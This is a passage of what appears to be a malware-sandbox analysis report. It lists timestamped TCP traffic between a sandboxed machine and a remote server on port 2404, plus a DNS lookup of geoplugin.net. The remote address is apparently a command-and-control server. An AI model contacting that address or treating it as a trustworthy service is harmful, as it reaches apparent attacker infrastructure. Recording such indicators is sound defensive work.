                                                            Dec 18, 2024 11:05:20.154866934 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.154902935 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.155006886 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.157066107 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.157165051 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.157273054 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.158885002 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.158940077 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.159091949 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.160943985 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.160980940 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.161099911 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.162834883 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.162945986 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.163170099 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.164823055 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.164891005 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.165057898 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.166840076 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.166995049 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.167049885 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.168827057 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.168870926 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.168965101 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.170669079 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.170798063 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.170871973 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.172620058 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.172739983 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.173248053 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.174592972 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.174952984 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.175015926 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.176467896 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.176748037 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.176826954 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.178383112 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.178440094 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.178484917 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.180357933 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.180485010 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.180538893 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.182281971 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.182395935 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.182451963 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.184262037 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.184353113 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.184443951 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.187572002 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.187608957 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.187681913 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.188237906 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.188337088 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.188394070 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.190258026 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.190428019 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.190490007 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.192240000 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.192293882 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.192363024 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.194077015 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.194130898 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.194360971 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.196000099 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.196194887 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.196247101 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.197940111 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.198055029 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.198120117 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.199999094 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.200033903 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.200087070 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.201850891 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.201908112 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.202011108 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.203804016 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.203933001 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.203984976 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.205761909 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.205867052 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.205962896 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.207696915 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.207797050 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.207856894 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.209695101 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.209884882 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.209976912 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.211631060 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.211684942 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.211744070 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.213489056 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.213594913 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.213711023 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.215683937 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.215718985 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.215780973 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.217401981 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.265115976 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.297666073 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.298332930 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.298350096 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.298409939 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.299387932 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.299451113 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.299777031 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.300379038 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.300429106 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.300451040 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.301867008 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.301894903 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.301913023 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.303227901 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.303256035 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.303283930 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.304805040 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.304820061 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.304863930 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.306040049 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.306055069 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.306087017 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.307377100 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.307679892 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.307692051 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.308820009 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.308845997 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.308873892 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.310158968 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.310209036 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.310297966 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.311435938 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.311455011 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.311482906 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.312848091 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.312865019 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.312895060 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.314100981 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.314116955 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.314150095 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.336169958 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.336255074 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.336324930 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.336880922 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.336915016 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.336939096 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.337702036 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.337765932 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.337941885 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.339309931 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.339359999 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.339382887 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.340276003 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.340331078 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.340351105 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.341711044 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.341767073 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.341922998 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.342828035 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.342925072 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.342986107 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.343815088 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.343874931 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.343888998 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.344818115 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.344852924 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.344896078 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.345905066 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.345956087 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.345979929 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.346975088 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.347037077 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.347090960 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.348332882 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.348417044 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.348472118 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.349363089 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.349423885 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.349493980 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.350435019 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.350482941 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.350562096 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.351718903 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.351778030 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.351793051 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.352737904 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.352804899 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.352896929 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.353848934 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.353909016 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.353949070 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.355042934 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.355102062 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.355190039 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.356245995 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.356316090 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.356584072 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.357388020 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.357464075 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.357620001 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.358515978 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.358603954 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.358643055 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.359627962 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.359698057 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.359771013 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.360768080 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.360836029 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.360894918 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.361905098 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.361965895 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.362097979 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.363146067 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.363200903 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.363271952 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.364317894 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.364351988 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.364372969 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.365569115 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.365694046 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.365746975 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.366516113 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.366586924 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.366645098 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.367882967 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.367947102 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.367974997 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.369016886 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.369072914 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.369195938 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.370105982 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.370140076 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.370160103 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.371231079 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.371283054 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.371304035 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.372445107 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.372478962 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.372524023 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.373553991 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.373613119 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.373785973 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.374619007 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.374690056 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.374732018 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.375858068 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.375915051 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.375936031 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.377055883 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.377089977 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.377146006 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.378098011 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.378165007 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.378192902 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.379534960 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.379592896 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.379628897 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.380631924 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.380692005 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.380762100 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.421361923 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.489273071 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.489331007 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.489399910 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.489739895 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.489757061 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.489793062 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.490947962 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.491300106 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.491411924 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.492213011 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.492229939 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.492275000 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.493172884 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.493483067 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.493531942 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.494313002 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.494571924 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.494637012 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.495410919 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.495502949 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.495569944 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.496716976 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.496752024 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.496794939 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.497751951 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.497803926 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.497869968 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.498831034 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.499026060 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.499077082 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.500052929 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.500070095 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.500113010 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.501070976 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.501157045 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.501240969 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.502244949 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.502518892 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.502705097 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.503308058 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.527137041 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.527184010 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.527241945 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.527570009 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.527610064 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.527681112 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.528654099 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.528708935 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:22.559511900 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:22.560976982 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:22.680651903 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.309850931 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:23.429649115 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.429713011 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.429747105 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:23.429795027 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:23.429835081 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.429887056 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.429953098 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:23.430021048 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.430072069 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.430159092 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.430222988 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.430397987 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.430464029 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.549479961 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.549592972 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.549655914 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.549782991 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.549820900 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.549889088 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.550209999 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:23.550299883 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:52.672270060 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:52.682589054 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:52.802120924 CET240449874212.162.149.91192.168.2.6

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 18, 2024 11:05:17.345722914 CET5546553192.168.2.61.1.1.1
                                                            Dec 18, 2024 11:05:17.485385895 CET53554651.1.1.1192.168.2.6

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 18, 2024 11:05:17.345722914 CET192.168.2.61.1.1.10x17dcStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                            DNS Answers
